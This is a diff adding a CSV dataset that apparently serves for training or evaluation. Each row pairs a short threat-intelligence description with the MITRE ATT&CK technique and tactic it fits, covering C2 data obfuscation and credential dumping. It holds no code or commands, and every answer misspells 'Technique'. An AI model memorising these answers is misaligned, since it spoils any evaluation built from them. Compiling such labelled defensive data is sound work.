diff --git "a/cyber_MITRE_CTI_dataset.csv" "b/cyber_MITRE_CTI_dataset.csv"
new file mode 100644--- /dev/null
+++ "b/cyber_MITRE_CTI_dataset.csv"
@@ -0,0 +1,13028 @@
+question,answer
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors encrypted IP addresses used for ""Agent"" proxy hops with RC4.","Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate will retrieved encrypted commands from its command and control server for follow-on actions such as cryptocurrency mining.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING can send and receive zlib compressed data within `POST` requests.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy may obfuscate portions of the initial C2 handshake.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can send compressed and obfuscated packets to C2.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has the ability to modify headers and URL paths to hide malicious traffic in HTTP requests.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can embed C2 responses in the source code of a fake Flickr webpage.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.,"Tecnique: T1001 Data Obfuscation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 added ""junk data"" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a ""junk length"" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.","Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear has used byte randomization to obscure its behavior.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.","Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can pad C2 messages with random generated values.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori has obfuscated the FML.dll with 200MB of junk data.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P2P ZeuS added junk data to outgoing UDP packets to peer implants.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P8RAT can send randomly-generated data as part of its C2 communication.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD samples were found to be highly obfuscated with junk code.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST added junk bytes to its C2 over HTTP.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can insert pseudo-random characters into its network encryption setup.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can add extra characters in encoded strings to help mimic DNS legitimate requests.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can use junk data in the Base64 string for additional obfuscation.,"Tecnique: T1001.001 Data Obfuscation: Junk Data, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Ghost, APT29 used steganography to hide the communications between the implants and their C&C servers.","Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used steganography to hide its C2 communications.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf can use steganography to hide malicious code downloaded to the victim.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When the Duqu command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.","Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAMMERTOSS is controlled via commands that are appended to image files.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can encode binary data into a .PNG file for C2 communication.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has used the .PNG file format for C2 communications.,"Tecnique: T1001.002 Data Obfuscation: Steganography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used a FakeTLS session for C2 communications.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL uses a FakeTLS method during C2.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL uses fake Transport Layer Security (TLS) to communicate with its C2 server.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING uses a cookie named `DSID` to mimic the name of a cookie used by Ivanti Connect Secure appliances for maintaining VPN sessions.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FakeM C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of FakeM use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HARDRAIN uses FakeTLS to communicate with its C2 server.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has the ability to mimic legitimate services with customized HTTP URL paths and headers to hide malicious traffic.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE has used FakeTLS for session authentication.,"Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use custom communication methodologies that ride over common protocols including TCP, UDP, HTTP, SMTP, and DNS in order to blend with normal network traffic.","Tecnique: T1001.003 Data Obfuscation: Protocol Impersonation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used GetPassword_x64 to harvest credentials.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used different versions of Mimikatz to obtain credentials.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has been known to dump credentials.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.","Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.","Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug has used credential dumping tools.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Suckfly used a signed credential-dumping tool to obtain victim account credentials.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used a variety of credential dumping tools.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak obtains Windows logon password details.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOMEFRY can perform credential dumping.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OnionDuke steals credentials from its victims.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).","Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has a plugin for credential harvesting.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can dump passwords and save them into \ProgramData\Mail\MailAg\pwds.txt.,"Tecnique: T1003 OS Credential Dumping, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used Mimikatz to capture and use legitimate credentials.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used Mimikatz and a custom tool, SecHack, to harvest credentials.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used Task Manager to dump LSASS memory from Windows devices to disk.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used ProcDump to dump credentials from memory.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles used Mimikatz.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has been known to use credential dumping using Mimikatz.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims. They have also dumped the LSASS process memory using the MiniDump function.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument ""dig.""","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, and ProcDump to dump credentials.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the Task Manager process to target LSASS process memory in order to obtain NTLM password hashes. APT5 has also dumped clear text passwords and hashes from memory using Mimikatz hosted through an RDP mapped drive.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has obtained memory dumps with ProcDump to parse and extract credentials from a victim's LSASS process memory with Mimikatz.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Windows Credential Editor for credential dumping.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used prodump to dump credentials from LSASS.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used procdump to dump the LSASS process memory.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has dumped credentials, including by using Mimikatz.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has gathered credentials using Mimikatz and ProcDump.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has stolen domain credentials by dumping LSASS process memory using Task Manager, comsvcs.dll, and from a Microsoft Active Directory Domain Controller using Mimikatz.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has used keyloggers that are also capable of dumping credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used its plainpwd tool, a modified version of Mimikatz, and comsvcs.dll to dump Windows credentials from system memory.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used the Farse6.1 utility (based on Mimikatz) to extract credentials from lsass.exe.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has attempted to access hashed credentials from the LSASS process memory space.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has used Mimikatz to obtain credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has dumped the lsass.exe memory to harvest credentials with the use of open-source tool LaZagne.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has used Mimikatz to harvest credentials from the victim's machine.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed dropping password grabber modules including Mimikatz.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains an implementation of Mimikatz to gather credentials from memory.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim’s machine.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can perform credential dumping from memory to obtain account and password information.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can run Mimikatz to harvest credentials.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lslsass can dump active logon session password hashes from the lsass process.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can dump password hashes from `LSASS.exe`.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Net Crawler uses credential dumpers such as Mimikatz and Windows Credential Editor to extract cached credentials from Windows systems.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya contains a modified version of Mimikatz to help gather credentials that are later used for lateral movement.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum was seen using MimikatzLite to perform credential dumping.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer contains a module that tries to obtain credentials from LSASS, similar to Mimikatz. These credentials are used with PsExec and Windows Management Instrumentation to help the malware propagate itself across a network.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials.","Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains an implementation of Mimikatz to gather credentials from memory.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can execute Lazagne as well as Mimikatz using PowerShell.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa can perform OS credential dumping using Mimikatz.,"Tecnique: T1003.001 OS Credential Dumping: LSASS Memory, Tactic: TA0006 Credential Access"
